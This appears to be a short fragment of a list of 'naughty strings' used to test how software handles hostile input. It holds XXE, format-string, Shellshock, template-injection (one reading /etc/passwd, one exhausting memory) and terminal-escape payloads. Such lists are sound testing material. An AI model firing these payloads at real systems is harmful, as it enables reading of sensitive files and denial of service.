&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;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$ENV{‘HOME’}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%*.*s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() { _; } &gt;_[$($())] { touch /tmp/blns.shellshock2.fail; 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&lt;&lt;&lt; %s(un='%s') = %u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+++ATH0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http://www.cum.qc.ca/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Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue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But now...[20Cfor my greatest trick...[8m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 quick brown fox... [Beeeep]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{% print ‘x’ * 64 * 1024**3 %}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{{ “".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd”).read() }}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